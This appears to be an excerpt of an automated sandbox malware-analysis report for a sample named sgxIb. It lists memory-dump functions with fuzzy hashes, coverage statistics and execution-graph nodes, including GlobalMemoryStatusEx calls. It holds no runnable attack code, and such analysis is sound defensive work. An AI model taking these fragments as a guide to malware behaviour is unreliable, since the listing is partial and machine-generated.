                                                    • Instruction ID: 707d659cbd3bc43f2f05eb26f37f911bfed708945d54350e12d3c5810115cd4b
                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                    • Instruction Fuzzy Hash: 8C11BB75504280DFDB12DF58C6C4B15BFA2FB84324F24C6AAD8498B296C33AE40ACB61
                                                    Function 0188D017 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1838059209.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_188d000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                    • Instruction ID: 8434414c2018a687e548762ca82ac6265cc7aaad1094846e45f8402893ff3e1e
                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                    • Instruction Fuzzy Hash: A411DD75504280CFDB12DF58D5C4B16FFA2FB84314F24C6AAD8498B696C33AD50BCBA2
                                                    Function 077BD208 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 53cb1616c69da39f7604ffa3cac817d5878c96331ff32c384adfd1ff644f113a
                                                    • Instruction ID: 828ce5688f7a1f27edd992a3317a5a8464760a75c8867cfbab488ff8da9e9714
                                                    • Opcode Fuzzy Hash: 53cb1616c69da39f7604ffa3cac817d5878c96331ff32c384adfd1ff644f113a
                                                    • Instruction Fuzzy Hash: 3D01DF72304351CFCB349F69D944ADABBF9EF8A3A1B15456AE509CB360DA31D840CB61
                                                    Function 077B4100 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8668ab70e8738978e239807bc33de4eda64f4f0e309c4ee4483c722548a955e6
                                                    • Instruction ID: 4ef90876d2ee0054333d3760adc6fde4d72067a4b4250748ac1c7e2cdaa2c4b0
                                                    • Opcode Fuzzy Hash: 8668ab70e8738978e239807bc33de4eda64f4f0e309c4ee4483c722548a955e6
                                                    • Instruction Fuzzy Hash: 7A01DF716002049FC724CB69C880FA6B3AAEFC6360F60C869D409CB321DB70EC02CB50
                                                    Function 0169D745 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1837768875.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_169d000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1804acb24cb35366aa54a8198fa49375a4692c2b8989ee64e11f5297bc33d870
                                                    • Instruction ID: 8436078f02630af5380224b88f771fa666514ffdd83830999344e7c1e8d5662b
                                                    • Opcode Fuzzy Hash: 1804acb24cb35366aa54a8198fa49375a4692c2b8989ee64e11f5297bc33d870
                                                    • Instruction Fuzzy Hash: 95018471008384ABEB115AA9CD84B7FBF9CEF41224F18C53AED095E286D779D841C671
                                                    Function 077B4110 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9a1aecb2bdfcb3297803dfe0d0cda3e14ea2f4a733321ecf7b2980b030bd234d
                                                    • Instruction ID: 0f9aed3fcfcbeb005579db58a7ebb4debd2c59f11c015900c4488aa2ffe40301
                                                    • Opcode Fuzzy Hash: 9a1aecb2bdfcb3297803dfe0d0cda3e14ea2f4a733321ecf7b2980b030bd234d
                                                    • Instruction Fuzzy Hash: E0016D747103059FC724DA69D840E6AB3EAEFC6360B60C879D409C7361DB71EC46CB94
                                                    Function 077B5DD7 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 930bda5c58c292e60451085fdc001236190213e534f8822265e00e6739ea85c7
                                                    • Instruction ID: 1404e2e1ca0a4bfd7917724e7b2b7b8009e1f3d9cae032a1f2c19aca0ddfb927
                                                    • Opcode Fuzzy Hash: 930bda5c58c292e60451085fdc001236190213e534f8822265e00e6739ea85c7
                                                    • Instruction Fuzzy Hash: 21F02872605222DFC7245F65A8097EAFBD8FF48750F09497EE41987211CB319815C7A1
                                                    Function 077B7DB0 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 63f4e77f9e959e2a6b2890f835e6b7fece03b7207bc5d5c066f9238d98991584
                                                    • Instruction ID: e5837afd0dda6279c29bc5baf284a7d6a832ad257c505901f5fd1dbe0409950a
                                                    • Opcode Fuzzy Hash: 63f4e77f9e959e2a6b2890f835e6b7fece03b7207bc5d5c066f9238d98991584
                                                    • Instruction Fuzzy Hash: 88013C75700200CFCB29CF68D484DA8B7F1FF88795B5544AAE5069B321CB32EC50CB90
                                                    Function 0169D744 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1837768875.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_169d000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e9901008cc22d46ae91c359400444865d24a9719f03ae0b2afcdb0a51e29f6bd
                                                    • Instruction ID: de0f30c904f7f5db5a64191865eaacec37d852002753f7ae16141e20809392fc
                                                    • Opcode Fuzzy Hash: e9901008cc22d46ae91c359400444865d24a9719f03ae0b2afcdb0a51e29f6bd
                                                    • Instruction Fuzzy Hash: 27F06271404384AAEB118E5ACC88B66FFACEB51634F18C45AED485E286C3799844CAB1
                                                    Function 077BDB40 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2fb061ff43c976b7e367afe1ec9e6bbf4292e57fdb9775edd1a81dede015751a
                                                    • Instruction ID: 584eae2434f20d0e2cf987cf25b290da4bbc082b2537402831451f8cafd7307d
                                                    • Opcode Fuzzy Hash: 2fb061ff43c976b7e367afe1ec9e6bbf4292e57fdb9775edd1a81dede015751a
                                                    • Instruction Fuzzy Hash: F5F0BE303402158FC734967CC944BAB77EAEBC27A0F144829D506CB364DF74DC418791
                                                    Function 077BDB33 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4b4e8306a6f4ca5af0fcb396c1ae50355718a3043b9ff80350e64143a450c52b
                                                    • Instruction ID: 655652a690afb973d194759337ebf8e97b0d1c35766efd898326b8ac7f1e7850
                                                    • Opcode Fuzzy Hash: 4b4e8306a6f4ca5af0fcb396c1ae50355718a3043b9ff80350e64143a450c52b
                                                    • Instruction Fuzzy Hash: 06F0BE713402019FC7309A69C944BAA77EAEBC27A0F044829E606C7360DF74DC41CB51
                                                    Function 077B56C9 Relevance: .0, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 71eb72e5e9c4b55f8863c7de17f3a49fff3b4fed82ada8ad9286d52521985ebf
                                                    • Instruction ID: 2b150ead1b74578db10769b296c9b5da6d61013b29cd540ecb587787f416332d
                                                    • Opcode Fuzzy Hash: 71eb72e5e9c4b55f8863c7de17f3a49fff3b4fed82ada8ad9286d52521985ebf
                                                    • Instruction Fuzzy Hash: 33F0BE363802069BCB049F38D440EAA37AEEF8A351B184465F800CB320DA39DD11DB91
                                                    Function 077B5DC3 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1a7021210e0734b02a165476f10e60b1f7a2fdf48e121dca27e8c1ce31f9e70
                                                    • Instruction ID: 6e1bc93ffb3d21011edbde86a5aa3729868364599b5ef6003c8fb853c75c0891
                                                    • Opcode Fuzzy Hash: c1a7021210e0734b02a165476f10e60b1f7a2fdf48e121dca27e8c1ce31f9e70
                                                    • Instruction Fuzzy Hash: 65F0E2B2204142CFC72A8A68E8453F9BB91FB49311F4C06FAD0098B251C736E465C751
                                                    Function 077B503A Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 751c68f2d10bf04c613c04c62bbb43128dbe3a37d9349901b07879b3ac8cf8da
                                                    • Instruction ID: a6e14bd8060d21a95a95ea7b2da4645fd460008dfab0106a3ad52ebf026ea71e
                                                    • Opcode Fuzzy Hash: 751c68f2d10bf04c613c04c62bbb43128dbe3a37d9349901b07879b3ac8cf8da
                                                    • Instruction Fuzzy Hash: D4F03AB1624106CFDB209B68D44A7F837F0FB04396F4400A5F005EB1A1EB74A9D5CBA1
                                                    Function 077B56D8 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ac5d3c505a055e72f4a7868949404e1f83497c75eb588397cf8b78bcbb52122
                                                    • Instruction ID: 0cc8de1892047e4594ba70d073389fa4cb3e2d599fd8c398cef98c2a71a09ccc
                                                    • Opcode Fuzzy Hash: 3ac5d3c505a055e72f4a7868949404e1f83497c75eb588397cf8b78bcbb52122
                                                    • Instruction Fuzzy Hash: 64F015363402069BCB15AF39E480CAE7BAEEF8A3917144469F9048B224DA75DD11CB91
                                                    Function 077B7E70 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f985b490db7511a64696ebec085f75d0d2f0c19af5084cb2022f891b414940a5
                                                    • Instruction ID: 271b43cbaaea02b23f9b0cfabb75f8beda5684f4e893e98c45682e4925d0b5d3
                                                    • Opcode Fuzzy Hash: f985b490db7511a64696ebec085f75d0d2f0c19af5084cb2022f891b414940a5
                                                    • Instruction Fuzzy Hash: CEE048B531421257DB2527B954647BA3FAA9FC56E1B050427F509CB304EE34CC0283D5
                                                    Function 077B7E80 Relevance: .0, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d88634e5fc507b0800bed3b2859c26cfd9793060d3f46aaf43a7b30f9d0e139a
                                                    • Instruction ID: 74c7c11761468d9612a91571a0e21cb1866d34b06a0a988047498fc5d55fac8c
                                                    • Opcode Fuzzy Hash: d88634e5fc507b0800bed3b2859c26cfd9793060d3f46aaf43a7b30f9d0e139a
                                                    • Instruction Fuzzy Hash: B7E04F75754326174B2922AD542467B2BEB8FC55E13150827F909CB344EE30CC0142E6
                                                    Function 077BA3A7 Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 612f68ab772d7ecbf8c641ded80773b854421d0fc23b58ddbff92f6a7b5bf98c
                                                    • Instruction ID: c5be8e832a2c018ad22bed0232ff4ee30bc849aa59b4ffd15451f20b5062b16d
                                                    • Opcode Fuzzy Hash: 612f68ab772d7ecbf8c641ded80773b854421d0fc23b58ddbff92f6a7b5bf98c
                                                    • Instruction Fuzzy Hash: A2E02B711402418FC701DB68E9846907F34EF04314B09C2A5E0084F6B2CB72EC9ACB84
                                                    Function 077B5680 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f0d216b4c6e576be66c5161655aba337b3531dce96929e71e0d2233ec42dc204
                                                    • Instruction ID: 2222832b934e172e9303af7db04aba42e0643dfcca9f800c0509b913dc049a32
                                                    • Opcode Fuzzy Hash: f0d216b4c6e576be66c5161655aba337b3531dce96929e71e0d2233ec42dc204
                                                    • Instruction Fuzzy Hash: 35F0AE36D4420CABCB44DFA4DA46ADDBBB5EB49200F1081A6E909A2204EA306B569B81
                                                    Function 077B4C6C Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c418033dbacb56d3342a0a15714a4d5bba5dfbfe72d37cf5d4177d3f3c2183cb
                                                    • Instruction ID: 11a339d3eb536cf1fb120fc01bb192ed9d6d923c05919ee5cd2792fb7de5842c
                                                    • Opcode Fuzzy Hash: c418033dbacb56d3342a0a15714a4d5bba5dfbfe72d37cf5d4177d3f3c2183cb
                                                    • Instruction Fuzzy Hash: 6FF09DB8A5521A9FDB14DF94C590AEDFBB1BB88700F218659E801AB355C770A940CFA0
                                                    Function 077B3C30 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0ba038fffc31cc2edd814ef38471a7dbb3d2f421f794b4bdced96d50e05b17f3
                                                    • Instruction ID: 01a1df8f3bab4080f38d8cb44816190b0174dbee2bb24e0e7c99503376f4ccb4
                                                    • Opcode Fuzzy Hash: 0ba038fffc31cc2edd814ef38471a7dbb3d2f421f794b4bdced96d50e05b17f3
                                                    • Instruction Fuzzy Hash: FFE086313502208FD7145B79D45EBE937E9EB49716F044079E409C3251CE68A8408B91
                                                    Function 077B4C7C Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c839a89eab1c413da360487515deed1a33690effde00104b3d1c922b35e1377
                                                    • Instruction ID: 76e668c3e2c805c14175723c90158ce32269eca88e4f73e21517696675ed5b1e
                                                    • Opcode Fuzzy Hash: 7c839a89eab1c413da360487515deed1a33690effde00104b3d1c922b35e1377
                                                    • Instruction Fuzzy Hash: D4F0DFB4A50209DFDB14DF94C890EADB7B1BF88700F208615E810AB365C730A840CAA0
                                                    Function 077B4FFE Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa75542398a121eb8f27333517a5739c10d882cc782def5ba963600abdb8efc3
                                                    • Instruction ID: fa5be9eec85eddbef4a54726bf2b0ed2dc82d4e79e414d0603f21284aac19976
                                                    • Opcode Fuzzy Hash: aa75542398a121eb8f27333517a5739c10d882cc782def5ba963600abdb8efc3
                                                    • Instruction Fuzzy Hash: CFE01A71610116CFCB109A68E4497E877B1FB48296F4000A5E015EB2A0DB759996CB50
                                                    Function 077B3C40 Relevance: .0, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2f69e7ac469456bce683e68c3a26c41e3d5a87c6df8bf4f3944ee5ff7f8e3ea0
                                                    • Instruction ID: 3456e86c3e6d3c82561002511d829f9023d0f17a5078333c0470d8ce8b00c97f
                                                    • Opcode Fuzzy Hash: 2f69e7ac469456bce683e68c3a26c41e3d5a87c6df8bf4f3944ee5ff7f8e3ea0
                                                    • Instruction Fuzzy Hash: 77D012307105148FC7185B79D458BE937DAEB44755F040069E409C7261CE609C408BD1
                                                    Function 077BA3B8 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08e5de1d9e99c28dd53d0fbbaba3e6f642ef2a295b5be28ec88a82d38ef6a487
                                                    • Instruction ID: fe4a09ddadfa79b7ad22d21500d61f062b0e6377260791871718bfe3c4e0025d
                                                    • Opcode Fuzzy Hash: 08e5de1d9e99c28dd53d0fbbaba3e6f642ef2a295b5be28ec88a82d38ef6a487
                                                    • Instruction Fuzzy Hash: 03D01270240204DFC700EB68EA84851BBA8EF49708319C5B8E0088F232DB72EC46CA90
                                                    Function 077B42EB Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da080cb9b7bf82e71c3165664916dfa7a18a379868c4c8866b82e8065faca7d4
                                                    • Instruction ID: bdc3de77907163f0e2cd3a1b383a704ac72387742949f269cbc2e5212bce9a9f
                                                    • Opcode Fuzzy Hash: da080cb9b7bf82e71c3165664916dfa7a18a379868c4c8866b82e8065faca7d4
                                                    • Instruction Fuzzy Hash: 0BD01236200208BFDB80AEA4C842E967769AB58610F909160FA088E241C272F862DBA4
                                                    Function 077B42F0 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5980d141b3095e19c9af729249e76eedf8b87ed8571b5661523d4b00407d51b
                                                    • Instruction ID: 6532fcef2b962d417c0ddd55caf27f803da57328bd69219126ed98969f2a4ba3
                                                    • Opcode Fuzzy Hash: b5980d141b3095e19c9af729249e76eedf8b87ed8571b5661523d4b00407d51b
                                                    • Instruction Fuzzy Hash: E8C01236200208AFDB80AAA4C800D967769AB18610F509060BA080A201C272E862DBA0

                                                    Execution Graph

                                                    Execution Coverage:14.8%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:25
                                                    Total number of Limit Nodes:6
                                                    execution_graph 25019 e10848 25021 e1084e 25019->25021 25020 e1091b 25021->25020 25024 e11340 25021->25024 25030 e11458 25021->25030 25025 e11343 25024->25025 25026 e112db 25024->25026 25027 e11454 25025->25027 25028 e11458 2 API calls 25025->25028 25036 e180f9 25025->25036 25026->25021 25027->25021 25028->25025 25032 e11356 25030->25032 25033 e1145f 25030->25033 25031 e11454 25031->25021 25032->25031 25034 e11458 2 API calls 25032->25034 25035 e180f9 2 API calls 25032->25035 25033->25021 25034->25032 25035->25032 25037 e18103 25036->25037 25038 e181b9 25037->25038 25041 656fa88 25037->25041 25045 656fa78 25037->25045 25038->25025 25042 656fa9d 25041->25042 25043 656fcae 25042->25043 25044 656fcc9 GlobalMemoryStatusEx GlobalMemoryStatusEx 25042->25044 25043->25038 25044->25042 25046 656fa9d 25045->25046 25047 656fcae 25046->25047 25048 656fcc9 GlobalMemoryStatusEx GlobalMemoryStatusEx 25046->25048 25047->25038 25048->25046

                                                    Executed Functions

                                                    Function 06563580 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 126 6563580-65635a1 127 65635a3-65635a6 126->127 128 6563d47-6563d4a 127->128 129 65635ac-65635cb 127->129 130 6563d70-6563d72 128->130 131 6563d4c-6563d6b 128->131 139 65635e4-65635ee 129->139 140 65635cd-65635d0 129->140 132 6563d74 130->132 133 6563d79-6563d7c 130->133 131->130 132->133 133->127 136 6563d82-6563d8b 133->136 143 65635f4-6563603 139->143 140->139 141 65635d2-65635e2 140->141 141->143 255 6563605 call 6563da0 143->255 256 6563605 call 6563d9a 143->256 145 656360a-656360f 146 6563611-6563617 145->146 147 656361c-65638f9 145->147 146->136 168 65638ff-65639ae 147->168 169 6563d39-6563d46 147->169 178 65639d7 168->178 179 65639b0-65639d5 168->179 181 65639e0-65639f3 call 656316c 178->181 179->181 184 6563d20-6563d2c 181->184 185 65639f9-6563a1b call 6563178 181->185 184->168 186 6563d32 184->186 185->184 189 6563a21-6563a2b 185->189 186->169 189->184 190 6563a31-6563a3c 189->190 190->184 191 6563a42-6563b18 190->191 203 6563b26-6563b56 191->203 204 6563b1a-6563b1c 191->204 208 6563b64-6563b70 203->208 209 6563b58-6563b5a 203->209 204->203 210 6563b72-6563b76 208->210 211 6563bd0-6563bd4 208->211 209->208 210->211 214 6563b78-6563ba2 210->214 212 6563d11-6563d1a 211->212 213 6563bda-6563c16 211->213 212->184 212->191 226 6563c24-6563c32 213->226 227 6563c18-6563c1a 213->227 221 6563ba4-6563ba6 214->221 222 6563bb0-6563bcd call 6563184 214->222 221->222 222->211 229 6563c34-6563c3f 226->229 230 6563c49-6563c54 226->230 227->226 229->230 233 6563c41 229->233 234 6563c56-6563c5c 230->234 235 6563c6c-6563c7d 230->235 233->230 236 6563c60-6563c62 234->236 237 6563c5e 234->237 239 6563c95-6563ca1 235->239 240 6563c7f-6563c85 235->240 236->235 237->235 244 6563ca3-6563ca9 239->244 245 6563cb9-6563d0a 239->245 241 6563c87 240->241 242 6563c89-6563c8b 240->242 241->239 242->239 246 6563cad-6563caf 244->246 247 6563cab 244->247 245->212 246->245 247->245 255->145 256->145
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                    • API String ID: 0-2392861976
                                                    • Opcode ID: 1cb52bdddf8533ee30a6afd90b08ac17d9fcd1187b642ae736ad7f7ca54d6049
                                                    • Instruction ID: f3d6b0e8349738bb964e1f190dced8259bd9d52ed251695e48f08d16a033618c
                                                    • Opcode Fuzzy Hash: 1cb52bdddf8533ee30a6afd90b08ac17d9fcd1187b642ae736ad7f7ca54d6049
                                                    • Instruction Fuzzy Hash: 8D321F31E1071A8FCB54EF75C89459DB7B6FFC9300F1096A9E409AB264EF709986CB81
                                                    Function 06567E98 Relevance: 3.0, Strings: 2, Instructions: 478COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
